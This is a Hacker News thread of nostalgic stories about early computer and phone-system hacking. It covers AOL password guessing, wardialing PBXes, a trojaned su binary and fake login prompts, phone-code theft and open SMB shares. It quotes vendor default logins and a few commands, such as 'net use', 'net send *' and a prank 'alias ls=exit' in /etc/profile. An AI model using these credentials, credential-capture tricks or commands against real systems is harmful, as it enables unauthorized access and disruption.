[HN Gopher] Black Hat Exploits of the Stupid-Easy 80s Author : mad_ned Score : 144 points Date : 2021-06-30 12:44 UTC (10 hours ago) web link (madned.substack.com) | pcdoodle wrote: | AOL | | Win32 API and VB6 Subclassing. Open random chatrooms, collect all | the screen names. Go to school. Computer dials AOL while parents | at work. Tries Screen Names as password. 3 attempts before AOL | Hangs up. Redials and tries next set of 3. Come home from school. | Fresh Screen Names. Free AOL. Terrorize Hanson Chat Room with | <font size = 9999999999999999> Instant Message. _Everyone has | left the chat_ | geocrasher wrote: | Early 90's Southern California. I was about 15 and had been | teaching myself Borland Turbo C++ at home with the SAMS book. At | school, there was a room in the Library with about 20 386sx/16's | that were used to teach kids... Borland TC++. The teacher? | Another student who was good at programming. I didn't know him, | but he had a reputation for being egotistical. My friend and I | just went in there at lunch to play QBasic games, which I'd | modify a bit for more fun. | | One day I decided to mess with the egotistical teen teacher. I | wrote a little TC++ program that ran from autoexec.bat. On | bootup, it put out several seconds of a low frequency buzz from | the PC speaker and then printed "Oh, Excuse me! I couldn't | contain myself!" and then disappeared. At that point, the | autoexec.bat removed the binary and then overwrote the old | autoexec.bat over itself, removing any proof. | | Nobody could say it was me, but the Librarian knew and said if I | did it again I wouldn't be able to go back. But she also said he | was really pissed by it and I get the feeling she got a kick out | of it, too. | JeremyReimer wrote: | You reminded me of a time in high school when I worked for the | local library. 
The librarian had a perverse habit of closing | the windows in the back room during the summer, making it | unbearably hot. My mother, who worked there full-time as the | Children's Librarian--the Librarian's direct subordinate--told | me that during winter this woman would open up the windows and | make everyone freeze. | | So while I worked on a program in FoxPro to automatically print | out new catalog cards, I also wrote a small program in | QuickBasic to print out (depending on the time of year) a | message saying "OPEN THE WINDOW!" or "CLOSE THE WINDOW!" (the | latter signed by "The Frozen Ghost") and then pause the | computer for a good minute or so just to make sure somebody | read it. | | For good measure, I made the AUTOEXEC.BAT file and my program | read-only, and then deleted ATTRIB.EXE from the hard disk so | that it would at least be somewhat annoying to remove. | | Years later I got a call from an IT tech who wanted to ask me | some questions about DOS (he never specifically said why!) and | I feigned ignorance. It felt good. | at_a_remove wrote: | I mean, there _was_ security, it's just that most of the holes | were so big you could drive a bus through, honking and dragging a | bunch of rusty bikes. | | I have walked onto MUDs and, annoyed at being killed by some | wizard for saying "hi," (stupid n00b move on my part) figured out | how to bring the game to a screeching halt in about fifteen | minutes. They had to bring it all down and patch to make me go | away. This wasn't a testament to my ability, it's just that | nobody was _thinking_ about this stuff in a defensive way. | | Oh, your system won't let me email that file out, you'll just | return it to me? Well, lemme just forge my send from so you give | it to me anyway. 
| | I got up to a lot of horsing around, almost all of it non- | destructive because getting attention generally is not a great | thing and it wasn't my stuff, I just wanted to see what was out | there and you either had to hear about it from someone who knew | it already or you had to stumble across it. | BrandoElFollito wrote: | Early 90's, university. I tricked the administrator of the UNIX | cluster to "su" from my account. | | The su binary was mine, she typed the root password and the | cluster was mine. | | I went to the administrators to say that I cracked the system and | would like to be part of the administrators team. I was accepted. | | I learned an awful lot over the next few years (as a student, and | then as a PhD student) - this helped me to land a job at IBM, and | then at another company that was expanding in Europe. | a1369209993 wrote: | > I went to the administrators to say that I cracked the system | and would like to be part of the administrators team. I was | accepted. | | See, this? This is how school computer systems are supposed to | work. | ddingus wrote: | The 80's | | This piece brought a few memories and impressions forward. | | One was hacking ULTIMA 2 and 3. Copy protection involved the bad | sector technique. However, those programs did not do an in depth | error check. Atari machines made a beep on each disk sector read. | | To play a copy of the game, one just counted the beeps, open the | drive door, wait for the error sound (how handy is all that?), | then close the door and carry on. | | Chain smoking... all through primary and most of high school, the | teachers lounges were filled with tobacco smoke. To their credit, | the educators did not reek in class, well one did, but those | areas of the building did. | | All grades were old school analog, in the grade book, in pen. | Changes were done with a strike through, new value, initial. 
| | One of my peers wrote a book report program in BASIC that would | generate a fairly healthy set of variations. The seed was a wait | for input loop. Was double digit report success before there were | questions. | | Someone plugged an expansion card into a running Apple ][ | computer and killed it. Despite a dead CPU, it displayed video | anyway. Was my first real experience with simple hardware vs | custom chips. Those computers did not have the spiffy sprites, | colors and sounds the C64 and Atari machines had, but they did | have just enough of the things that really mattered when it came | down to getting real work done. Someone looked the machine over, | plugged in a replacement chip and it was running again. Nice. | | At the local university there was a card operated photo copy | machine. 5 cents a page or something like that. But, one could | ask for a copy, and listen for a little whine as some part began | to spin up, hit eject on the card and get a free page. | | Most locked doors in my primary school could be opened with just | hand manipulation of the doorknob. Turns out they were not | mounted in their recommended orientation. A gravity based attack | was possible and I found it one day bored just fiddling with the | knob. Turns out, the more I moved it, the more motion was | possible! | | Reporting that got me into trouble too. I remember that clearly! | | Of course they were angry at the doors being so easy, tried to | assign blame to me, a 6th grader, and were more concerned about | the work and cost to fix the issue. | | If only people would just avoid doing anything unexpected, there | would not be a problem. In fact, there was not a problem, until | you came along... | | I remember looks on adult faces I did not see often when my | response was, "How would you know?" | | Some foreshadowing there for sure. | | Heck, I even did responsible disclosure. Took it right to them | first. Could have blabbed it to others and then what? 
| | Yeah, got the look again. | | One phone related one was super interesting too. A friend and I | took an old pulse dial phone apart and were kind of stunned to | see how simple it was. Then we made calls successfully without | the dialer, just slapping the handset hook with anything close to | the expected pulse rate. Cool. | | Then we called one another and were doing it again, just | interrupting one another. Soon, an operator was on the line | asking how we did this call. So we told her. | | Turns out we had dialed some test sequence or other. Of course it | was not published and was not intended for use doing an actual, | live call. Tech had to reset the whole thing, but we did get a | super cool tour of the system later as that same tech was happy | to show us how the robot like, electromechanical system worked. | Amazing. These trees of open circuits! When one dialed a number, | that number was an address that literally moved and rotated arms | that closed the circuit to connect the intended phones! | | Fun times. So much was human scale and could be directly seen, | heard, felt and was slow enough to be explored directly. | teknopaul wrote: | seems like bragging about it is still the number one way to get | caught. | Bluecobra wrote: | > (Also worth mentioning: everyone's assigned password was their | social security number!) | | My student ID in college was my SSN, and that was only 20 years | ago. :( | tptacek wrote: | This is a fun post. It's sort of mind-blowing to think about in | the era of 15 page Project Zero posts about reverse engineering | nested AMD SVM virtualization control blocks, but throughout much | of the 1990s, the modal vector for an actual hacker taking over a | network --- any network --- was simply by mounting a world- | exposed NFS share. Leendert van Doorn's NFS shell was probably | the most important hacking tool of that entire decade. 
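An added illustration of the "world-exposed NFS share" tptacek mentions, not code from the thread or the linked article: a small audit of /etc/exports entries that flags exports with no host restriction, exports to `*`, and `no_root_squash`. The exports text below is constructed for the example; the option names are the standard Linux exports(5) ones.

```python
"""Flag the classic world-exposed NFS export patterns in an
/etc/exports-style file.  Added example, not from the thread.
SAMPLE_EXPORTS is constructed for illustration."""
import re

# exports(5) syntax: <path> [client[(opts)] ...]; a bare path, or a
# client spec of '*' or just '(opts)', means "anyone who can reach port 2049".
CLIENT_RE = re.compile(r"([^(]*)(?:\((.*)\))?")

SAMPLE_EXPORTS = """\
# constructed sample exports file
/home            *(rw,no_root_squash)
/srv/pub         (ro)
/export/data     10.0.0.0/24(rw) backup.example.net(ro)
/export/scratch
"""


def parse_exports(text):
    """Return [(path, [(host_spec, {options}), ...]), ...]."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments
        if not line:
            continue
        path, *tokens = line.split()
        clients = []
        for tok in tokens:
            host, opts = CLIENT_RE.fullmatch(tok).groups()
            clients.append((host, set(filter(None, (opts or "").split(",")))))
        if not clients:
            clients.append(("", set()))          # bare path: exported to everyone, default options
        exports.append((path, clients))
    return exports


def world_exposed(host_spec):
    """No host, or the wildcard host, means any client may mount it."""
    return host_spec in ("", "*")


def audit(text):
    """Return human-readable findings, worst-first within each export."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            mode = "rw" if "rw" in opts else "ro"   # exports default to ro
            if world_exposed(host):
                findings.append(f"{path}: {mode} export to any host")
            if "no_root_squash" in opts:
                findings.append(f"{path}: no_root_squash for {host or '*'} "
                                "(remote uid 0 is root on this filesystem)")
            if "insecure" in opts:
                findings.append(f"{path}: 'insecure' accepts mounts from "
                                "unprivileged source ports")
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORTS):
        print(f)
```

Restricting the client list is necessary but was never sufficient: NFSv2/v3 over AUTH_SYS trusts whatever uid and gid the client puts on the wire, which is exactly what nfsshell let you set by hand once a mount was possible. The combination that era mostly lacked is a tight client list, `root_squash` left on, and Kerberos (`sec=krb5p`) so the server, not the client, decides who you are.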
| mikewarot wrote: | I was a young CS student, and the VAX administrators had written | a program called SETUIC to work around some limitations on | hardware to allow business students access to an IBM mainframe. | | If you ran SETUIC with no parameters, it set your UIC to [0,0], | silently. _Anyone_ , not just business students, could run it. | The system environment variables pointed to it, like a big | advertisement sign to a young CS student. | | I learned many things about how the world works after | accidentally discovering this fact. It is fortunate for me that a | 2 year suspension was the extent of my punishment. They were | hopping mad, not at my actions, but at those who I was foolish | enough to share this knowledge with, and had acted far less | conservatively than I had. | | I later was a system administrator, elsewhere, for 15 years. | api wrote: | My friends and I "hacked" AT&T System 75 and similar PBX (intra- | office phone system) machines in the early 1990s for various | reasons, and they were easy to get into because they came loaded | with like 20 default admin accounts. | | I remember a few of these: "cust/custpw", "rcust/rcustpw", and | "craft/craftpw" come to mind. Almost nobody removed or changed | the password to these accounts. | | We'd find the machines using a "wardialer" (named after the phone | scanning scene in Wargames) app that would dial every number and | look for modems. We used a DOS scanner called "ToneLoc." We lived | in Cincinnati and could easily scan all kinds of local number | prefixes for free that overlapped with areas that were likely to | dredge up a rich PBX haul: downtown, near the airport, near | universities, etc. A certain kind of weird 1200-bps answer with | unusual parity settings (7E1 if I remember correctly) was a dead | giveaway for one of these ridiculously vulnerable AT&T PBX | machines. 
| | Once you got in you could pull pranks, set up remote access lines | to get "free" phone calls, set up party lines for you and your | friends, etc. | | I was like 14 or 15 at the time. | | We also found other "phun" things with our wardialer including | large outdoor signs with modems to allow remote configuration of | the text they would display. If you saw "SMOKE POT EVERY DAY" and | similar things a 15 year old would write on a highway or | advertising sign in Cincinnati in the early 1990s that was us. | | There was a real sense of exploration back then. When we scanned | areas like downtown Cincinnati we'd find tons and tons of modems | that would answer with mysterious (to us) prompts or blobs of | binary spew that I'm sure represented protocols we didn't know | how to emulate. A few times we managed to try obvious-sounding | login/password pairs on some of these login prompts and find | ourselves inside an Ultrix or a SunOS machine full of mysterious | data. We really didn't bother anything on those machines, just | looked around. We pulled pranks with things like signs but the | only things we really ever messed with or possibly damaged were | the PBXes. There were just too many fun things to do with those. | | The weirdest thing I remember finding was something that | initiated an Xmodem transfer and sent a black empty pixmap and | then hung up. I wonder if it was some kind of camera or | industrial monitor that was not actually working but was still | on. | | The most "alarming" thing we found was some kind of building | controller that we assumed belonged to a downtown skyscraper and | seemed to control elevators, which we didn't fuck with out of | concern that it could actually hurt people. Don't know if you | could have done anything dangerous with it but we didn't want to | try so we just dropped that one. | | There just wasn't a lot of security back then because it was all | new and very few people knew how to do what we were doing. 
Even | though Wargames popularized the idea of phone scanning people | still seemed to assume that a live modem on a phone line was | secure if the number was obscure. | | All that started changing really rapidly in the late 1990s when | tons of people got online. | | Edit: found the scanner! | | https://en.wikipedia.org/wiki/ToneLoc | | https://archive.org/details/20040130-bbs-mthreat | passwordreset wrote: | SWIM once said to me: Funny thing about those System 75's, the | entire ordeal originated from the hack of a bank's telephone | system, who had a small Unix UUCP network and, for some odd | reason, put all their System 75 logins and passwords into their | Systems file. The default login information leaked out after a | hacker named Syadasti announced that he was willing to turn any | System 75's given to him into usable remote PBXes, and | eventually some other hacker (Scott Simpson, maybe? don't know) | set up a system on his own home line that responded like a | System 75 would, and gave Syadasti that number. He promptly | tried to login with the cust/rcust accounts, which were | recorded by the other hacker, which led to the explosion of | System 75 hacks throughout the US. | tyingq wrote: | Shared computer labs were dead easy to scrape account info from. | Since the terminals were text, it was easy to code up a password | scraper. You write a program that faked the login and password | prompts, record the data, say "password incorrect", then exit, at | which point the real login daemon would take over. Cliff Stoll's | "The Cuckoo's Egg" describes this pretty well. | [deleted] | colordrops wrote: | The easiest exploit I can recall (late 80s? Early 90s?) was | getting credit card numbers from tossed receipts at gas station | pumps. | 29athrowaway wrote: | Initially there was no validation for credit cards. There were | programs called credit card generators that could generate a | card from any bank in the world, with any name on card, etc. 
| | If you wanted you could generate a card for McLovin from some | bank in Hawaii and it would work. | | I never used them but a close friend back in middle school did | and got his computer taken away permanently. | edmundsauto wrote: | This was a checksum that machines could run locally, to make | sure the account # was "valid". Then, in batch, systems would | connect to the bank for the account interaction. | | Some services (AOL, when it charged by the minute) wouldn't do | the actual bank reconciliation for a few days, during which | you could use the service. | bluedino wrote: | You could get the whole carbon from a counter at a department | store if the cashier wasn't around. | sgerenser wrote: | I worked at Sears selling TVs while in college from 2002-04, | and even in their latest POS systems anyone could walk up to | the thermal printer, press a button (even with the register | itself locked) and print out a reverse-chronological "journal | roll," which included names, addresses, phone numbers and | full credit card numbers and expiration dates for every | transaction. Crazy that anyone thought that was OK in the | early 2000s. | failwhaleshark wrote: | Before carbonless, the carbon slips between the layers. There | were up to 4 additional copies made on some of those kinds of | forms and you'd have to press very hard with a ballpoint pen in | order to get it to register at the bottom. Then, the credit | card imprinter had to press the card to get through them. | | Since most cards don't have raised numbers anymore, manual | credit card imprinting is no longer possible. | irscott wrote: | You used to be able to Google for transaction information from | a particular e-commerce shopping cart and get .txts of credit | card info, name, address. The wild west was wild. 
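The "checksum that machines could run locally" in edmundsauto's comment is the Luhn check, and it was all an offline "credit card generator" had to satisfy. Added example, not from the thread: the validator, plus the completion step that appends the check digit to a chosen prefix, which is the whole trick those generators performed. The numbers used are widely circulated test values, not real accounts.

```python
"""Luhn (mod 10) check digit: validate a number, or complete a chosen
prefix so that it passes.  Added example, not from the thread.
The test values below are public Luhn examples, not real cards."""


def _clean(number: str) -> str:
    """Drop the spaces and dashes people type into card fields."""
    return number.replace(" ", "").replace("-", "")


def luhn_sum(digits: str) -> int:
    """Luhn sum over a complete number (check digit included), mod 10.
    Every second digit from the right is doubled and, if that gives
    two digits, reduced by 9 (i.e. its digits are summed)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10


def luhn_valid(number: str) -> bool:
    """True when the number is well-formed and its Luhn sum is 0."""
    digits = _clean(number)
    return digits.isdigit() and len(digits) >= 2 and luhn_sum(digits) == 0


def luhn_complete(prefix: str) -> str:
    """Append the single digit that makes `prefix` Luhn-valid.
    Computing the sum with a placeholder 0 in the check position tells
    us how far we are from a multiple of 10."""
    prefix = _clean(prefix)
    if not prefix.isdigit():
        raise ValueError("prefix must be decimal digits")
    shortfall = luhn_sum(prefix + "0")
    return prefix + str((10 - shortfall) % 10)


if __name__ == "__main__":
    print(luhn_valid("4539 1488 0343 6467"))   # a public test number
    print(luhn_complete("7992739871"))          # 79927398713
```

The check only catches typos (any single wrong digit, most adjacent transpositions); it says nothing about whether an account exists, which is why a generated number sailed through anything that deferred the real authorization to a nightly batch. The first six digits of the prefix are the issuer identification number, which is the "from any bank you like" part of the old generators.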
| Trias11 wrote: | You could browse all files on many remote computers via: | | net use \\123.45.6.78\ | | dir \\123.45.6.78\ | spullara wrote: | I've been thinking about writing up a similar post focused on all | the dumb stuff that was possible in the 80s. Everything from | default voice mail passwords, long distance carriers with | predictable code patterns, office phone systems that tell you as | soon as you have a wrong digit for outside line access, DECs own | global asset management system having a huge security hole in it, | etc. Honestly though you can just read the first half of | Mitnick's book up until the point he starts breaking into actual | buildings to get a feel for it. Social engineering was and will | remain the most powerful tool in the hacking arsenal. | 300bps wrote: | _long distance carriers with predictable code patterns_ | | Thank god for statutes of limitations. Sorry MCI and Sprint for | getting about 20 codes per night with my 300 baud modem when I | was 13. | leifg wrote: | I still remember when Windows computers being hooked up to a | dial up would be open on the internet. Lots of them had no admin | password and all drives were shared by default. | | So by just port scanning on the SMB port you'll find a lot of | computers and would have access to all their files. | arminiusreturns wrote: | Man I stumbled on some crazy stuff back then when doing scans, | one of the more notable was finding an ISP billing system with | its C drive shared over netbios (137/138). It was such the | wild west days of the internet. | | Stuff like: I got in the local newspaper for recovering a county | server password that had been lost... cracks me up in | retrospect. | AnimalMuppet wrote: | With a cable modem, you were on the same physical cable as your | neighbors. If you looked at "Network Neighborhood", you would | see your neighbors' computers and printers (unless they had | turned off file and print sharing). 
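The fake-login trick tyingq describes a few comments up (mimic the prompt, record what is typed, print the usual error, exit so the real login program takes over) is reproduced below as an added example, not code from the thread. The terminal I/O is injected so the capture logic can be run without a terminal; the host name and the in-memory sink are assumptions.

```python
"""Reproduction of the shared-lab 'fake login prompt' trap: show the
banner, read a name and a password, claim the attempt failed, and
return so the real login program gets the next try.  Added example,
not from the thread.  read_user/read_password/write are injected so
the logic can be exercised without a terminal; the host name is an
assumption."""
import getpass
import sys

LOGIN_BANNER = "\n{host} login: "
PASSWORD_PROMPT = "Password: "
# login(1) prints exactly this on a failed attempt; matching it is what
# makes the victim assume a typo and simply try again.
FAILURE_TEXT = "\nLogin incorrect\n"


def fake_login(read_user, read_password, write, host="lab12"):
    """Imitate one login(1) prompt cycle and return (user, password)."""
    write(LOGIN_BANNER.format(host=host))
    user = read_user().strip()
    write(PASSWORD_PROMPT)
    password = read_password()        # the real login does not echo this
    write(FAILURE_TEXT)
    return user, password


def harvest(read_user, read_password, write, sink, host="lab12"):
    """Run one fake cycle and record the result in `sink` (a list here;
    the original prank appended to a hidden file)."""
    cred = fake_login(read_user, read_password, write, host)
    sink.append(cred)
    return cred


def main():
    captured = []
    harvest(sys.stdin.readline,
            lambda: getpass.getpass(""),   # prompt already written above
            sys.stdout.write, captured)
    sys.stdout.flush()
    # Exiting is the important part: the real getty/login now owns the
    # terminal, the second attempt succeeds, and nothing looks wrong.
    raise SystemExit(0)


if __name__ == "__main__":
    main()
```

The tell, then and now, is a first attempt that always fails. The defense those lab terminals lacked is a trusted path: a key sequence the kernel intercepts and that kills everything attached to the terminal before the genuine login starts (the Secure Attention Key on a Linux console, Ctrl+Alt+Del on Windows), so a user-level program cannot be the thing asking for your password.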
| bluedino wrote: | Fire up Ettercap and read unencrypted AIM conversations... | thedougd wrote: | Ah yes, I had forgotten about this. Routers and access points | weren't yet a consumer item. | MeinBlutIstBlau wrote: | The typical 80's hack I always think of is in Ferris Bueller's Day | Off where Ferris hacks the school's records to change the number | of days he was sick. Not only was there no internet, but how did | he connect to the network? It's something I've always wondered if | it would've even been possible. | kgwxd wrote: | He learned a lot while hacking the WOPR. | pjmlp wrote: | Here are modems for Timex 2068, | https://www.timexsinclair.com/products/hardware/rs232-serial... | mad_ned wrote: | possible, maybe not likely. our school for instance had a modem | line you could dial into, that let you access this one program | that was for career counseling, it was like a buzzfeed quiz | that asked you questions, and then recommended a career for | you. I think I got plumber. we tried to hack past this to get | at the general OS, but no luck. I suppose someone could set | something like that up for the school record access, but would | they? (like I claim in the article, it was the 80s so maybe) | dave_sullivan wrote: | I had a project one time for a school district and had access | to all of that. Made me think of the "changing grades remotely" | trope and had a pretty good chuckle. Wouldn't have been | possible when I was a kid but it is now I guess. | bluedino wrote: | Early 90's, but our computer system (some sort of minicomputer) | had a modem bank so that teachers could do grades and such from | home. I worked in the office because I had an open hour, I | earned a credit and I also got to see the guidance counselors | view students records and such. It would have been very, very | easy to change grades. | | Also, many schools had internet connections back then. 
I know | our school had a T1, it might have also had a leased line to | the state education system for some reason, I would guess the | security was very lax back then. | dragontamer wrote: | > Not only was there no internet, but how did he connect to the | network? | | Most "networks" were over phone lines those days. | | You call in with a modem, and that connects you into a | particular computer (or in the general case: a network). BBS | for example was just a shared computer on a modem on a well- | known publicly posted telephone number that many people called | every now and then to check for message. | | If you knew the correct telephone numbers and the proper | parameters to connect (baud rate, modem type, etc. etc.), you | could even get a printer (aka: Fax Machine), a UNIX login | prompt, or other equipment inside of an office (and presumably | a school). | | ---- | | Now why would a school put their grades database on a publicly | facing telephone number and hope it doesn't get hacked? Well, | that's a good question. | | But then again, ATM machines in tiny liquor stores are still | largely on this telephone-line / modem technology (I dunno if | it's still like this today, but even just 10 years ago, a | surprising number of ATM machines were still accessible over | dial up). So why don't you ask the ATM machine engineers why | they think that this practice is safe. | | After all, if it's safe enough for ATMs, it's probably safe | enough for a school network. If this thought process is | horrifying to you, then welcome to the 80s / 90s era of | computer security. | kQq9oHeAz6wLLS wrote: | > Now why would a school put their grades database on a | publicly facing telephone number and hope it doesn't get | hacked? | | Same folks who built David Lightman's school system, | apparently. | goalieca wrote: | My high school had the attendance computer in main office and | it could be found on the network from any other machine. 
| Everyone knew the password to it since was used and shared | for all other admin and IT tasks. | kmeisthax wrote: | This concept is a little weird to think about today, but the | Internet used to be accessed through regular voice phone lines. | You'd plug your computer into the phone network with a little | thing called a modem. In the _really_ early days you actually | had to use an acoustic coupler for regulatory reasons. Then you | dialed the phone number of the computer you wanted to connect | to - most of which were _not_ running the Internet Protocol! | | Typical computer systems you would dial into would include... | | 1. Proprietary data services (AOL, Compuserve, etc) | | 2. BBS systems - typically individual computers running | services that let you send messages or files to other users who | could then dial in to receive them. Some BBSes were even | networked to one another, the largest of such systems being | Fidonet | | 3. Remotely-managed IT equipment - the sort of thing depicted | in the movie. | | 4. Mainframes - universities and large businesses would often | have remote access that you'd dial into. This is roughly | equivalent to SSHing into an Internet-connected machine today. | | 5. The Internet - originally only through remote access to | mainframes (#4). Later on, data services (#1) started offering | open Internet access. (notoriously, AOL utterly demolished | USENET's existing cultural norms by doing this) Then companies | started just selling dial-in Internet access without other | services and this became the dominant use case for modems. | | This concept was inverted starting in the late 90s. First, | phone companies started offering "digital subscriber lines" | (DSL) that provided way more bandwidth to connect to an ISP | with. Then, (at least in North America, thanks to various Sega | Genesis related reasons) cable companies got in on this and | started offering "broadband Internet", too. 
With the greater | bandwidth of these services, it suddenly made sense to send | Voice over Internet Protocol (VoIP) instead of Internet | Protocol over Voice. So dedicated landline channels became very | outdated _very quickly_ , and today we think of voice as just | something you send over a multitude of Internet apps. | bluedino wrote: | Don't forget about your dialing into your office computer to | work from home, using something like LapLink or PC Anywhere | CountDrewku wrote: | Watch War Games and that'll give you a general overview of how | you'd access a system back in the 80s. They were still | networked and accessible remotely, just not the way they are | today. | ulzeraj wrote: | Very cool stories. I remember running some pranks but those are | all from the early 2000s. | | Best story I remember there was this arrogant guy that I worked | with in the Unix department. He was into FreeBSD by that time and | had an attitude towards the Linux guys. One day he left his table | and forgot his machine open with a root prompt. They took the | chance and modified inetd.conf to map a certain port to the | shutdown program. People had so much fun shutting down his | computer remotely and watching his reaction. | | There was also this time working for a smaller company and we | would prank each other all the time. I had admin access to the | Linux router so I've created a NAT rule to redirect this guy's | traffic to a transparent squid proxy running a perl script that | relied on ImageMagick to turn the images upside down. Got the | script from a Slashdot post. Poor guy even tried to reinstall the | OS to no avail. He eventually found out and had his revenge by | going into my computer CMOS and setting disk access to PIO | instead of DMA. | | I also remember scaring people through Windows' net send commands | and that one where you take a screenshot of the desktop then you | remove all the icons and interface bars and set the screenshot as | background image. 
Also randomly adding 'alias ls=exit' to some | server /etc/profile. | jonshariat wrote: | Not a programmer but lots of good memories doing the background | trick by hand. Good times. | 29athrowaway wrote: | A highly recommended text file, enjoy: | | Anatomy of a pirate | | http://www.textfiles.com/piracy/anatomy.txt | tobinfricke wrote: | When the web was new, one could use Altavista to search for | /etc/passwd files accidentally exposed to the web, and crack | them. Even better, many *nix machines shipped with some accounts | having no password by default. I remember one could easily telnet | into almost any SGI Irix machine via the "lp" account. | jamal-kumar wrote: | Back in the mid-2000s I was really into computer security (still | am) and managed to trick my school's truancy system using | something called a silent termination test line. Basically what | this does is cuts out the line entirely to test for line noise | for a few minutes, like you pick up the phone and it'll still be | connected to that number, no dial tone just silence. I just | confidently went right up to the secretary and told her my new | home phone number was the silent termination test line. There | would be this automated truancy bot calling everyone but whenever | it would reach my name, skipping around a class a day at one | point (Still don't know how I actually graduated other than the | teachers liking me and getting my homework done anyways), it | would just fuck the entire system up and a bunch of people | wouldn't get calls after me either. | | Smoking drugs and hanging out with girls was way funner, | completely zero regrets getting stuff like that out of my | system early... considering the trajectory my life has been on I | really didn't need post secondary. Can only imagine how stressful | and expensive that would have been and to what depressing, | indebted end. 
| | There was a bunch of other fun stuff on that test prefix, but | half of that is lost to the sands of time, the funnest I don't | even know what the hell it was. I've asked random phone company | linemen about it and they're basically just like "how the hell do | you even know anything about this?", and can't tell me what this | number I found was. I basically war-dialed it based on patterns | from other numbers on the prefix and it'd give me 30 seconds and | then a real dial tone (payphones around then actually used some | recorded tone). Since I could call these numbers for free from | the school payphone, it was easy to find, and that real dial tone | was probably in the phone company HQ. We found this enormous list | of interesting phone numbers from phonelosers.org (Wish those | were archived!) and just started doing shit like calling the | white house and the president of kenya's office. I think we only | stopped after a friend of mine made a huge stupid mistake and | tried to print the list out. The library printer just started | spitting out REAMS of paper, the librarian was like what the hell | and I just remember thinking damn he fucked up, and running away | hahaha | techrat wrote: | Web archive goes back to 1997... | | http://web.archive.org/web/19990125102138/http://www.phonelo... | jamal-kumar wrote: | I don't know if I have time to dig through all of that with | the interspersed broken links but I am pretty sure it was on | phonelosers.com which was their forum | | Still thanks for the link I haven't seen this in ages | | I think RBCP went to jail at some point | | The closest thing I can find on google is a really old | version from 1995: | http://www.textfiles.com/groups/PHONELOSERS/pla007.txt But | the thing got HUGE over like a decade | thedougd wrote: | Some fun ones: | | BBS games started adding virtual currency that you could transfer | between players. 
Some even participated in a network of BBS | systems, allowing the movement of game currency from one BBS to | another. These frequently didn't have input validation and you | could transfer -1 to another player and they'd receive 4294967296 | dollars. Unfortunately we were kids and kids do nasty things. We | would completely upend a competitive game by giving all the | underdogs huge wealth. | | Pager numbers all fell in the same exchanges. Every number under | 123-456-xxxx would be a pager. I wrote a program to war dial all | these and leave the same victim's phone number on all the pagers. | We did it to a friend and witnessed an endless stream of | frustrated calls to their house for a few hours. Brutal. | | A school system put their mechanical control systems on a modem. | We acquired the software and directory that could access these | control systems. Not only did they put all the HVAC systems on | it, they also added things like emergency and off-hour lighting. | Some of the stuff that was controllable through this remote | interface was down right scary: boiler pressure measurements, | boiler system valves, etc. We weren't stupid enough to mess with | that but would have fun turning off all the lights at night, or | turning up the heat before the Saturday morning recreation | basketball games in the gym. | brk wrote: | I remember using odd/unprintable characters in those BBS games | for my username. There was one (spacewars?) where you got a | bounty, but had to type in the characters name to claim the | bounty, people would complain they could not collect the bounty | against me, as my name was basically brk[null character]. | reid wrote: | My high school in 2003 used IBM PCs with Windows NT. I discovered | the Messenger service, enabled by default, remained enabled and | was not turned off by group policy. | | Start > Run, type "cmd", then: net send B131 | "Hi there" | | This would pop up "Hi there" on the B131 computer. 
The hostname | of each computer (B131, for example) was taped to the top of each | monitor, so I had a great time annoying my classmates in computer | lab. One day students around me noticed me doing this and I | naively showed them how to do it. I helpfully suggested to | _never_ type * as the hostname or the message would send to all | computers. | | After a school-wide DDoS from several students around me sending | messages over and over like: net send * "this school is the worst" | | ...and a lot more unmentionable messages, I was soon escorted out | for a three-day suspension for "hacking the school network." Good | times. :) | jamal-kumar wrote: | heh I remember doing a little bat file that was something like | @echo off | net use e: \\Network\Share | | to get to the network shares which I could see in Windows | 2000's network display but would just tell you 'access denied' | if you tried to simply click on them. Just giving them a drive | mount like that worked fucking swimmingly. It gave us access to | pretty much everything, including this program called | 'photodex' where the username and password was the first | initial of our principal's first name and his last name and the | password was 'teacher'. Some other kid figured this out at some | point before us, and we found a folder containing a bunch of shit | with super obvious file names like TEENPORN.JPG.EXE and the kid | we didn't really like in our IT class who turned out to be a | registered sex offender as an adult (he told me this at a | wedding after complaining that they took his guns away, and all | I could do was remember this incident and laugh) actually went | and clicked one of these because he was a bit thick in general, | and ended up getting in shit for this. I don't remember if they | managed to lock things down properly after that but I think I | remember recalling that this ruined the fun. | peter_l_downs wrote: | Great writing.
I never did anything so interesting, but I have a | few fun stories from high school. Our school district gave every | student access to a mac laptop for coursework, but of course we | used to play a lot of flash games. Eventually they got around to | updating the network's blocklist or whatever so addictinggames | couldn't be accessed anymore. I'm sure they thought they were | very smart but this just raised the stakes. | | Of course we couldn't install games or our own software on the | computers -- the `/Applications` folder was locked down and | nothing would execute outside of it. They weren't totally stupid, | they had some remote monitoring and privilege blocking software | to prevent us from getting control of our own machines and doing | silly things like playing games or even opening the Terminal. But | eventually someone (not me, really, I wish I were this smart) | figured out that inside of one of the pre-installed .app's there | was a directory to which users still had write permission. So | everyone in the entire school started playing Marble Blast Gold | and, for some reason, Pokemon Red through an emulator, all just | by dropping the programs inside the special folder | `/Applications/SomeThingICantRemember.app/contents/special- | folder/`. The games spread like wildfire because the school had | also set up a system of shared network folders, one for each | teacher, so that teachers could more easily share files with us. | Turns out we could also use it to share files with each other. | Lots of movies, as well. Eventually someone noticed and shut that | all down. | | Of course, high school students want to play games instead of | doing coursework, so one day someone (not me, really) realized | that if you removed the battery from the laptop you could then | unscrew the case and remove a stick of RAM, which would allow you | to hold certain keys at boot to reset the PRAM or something like | that.
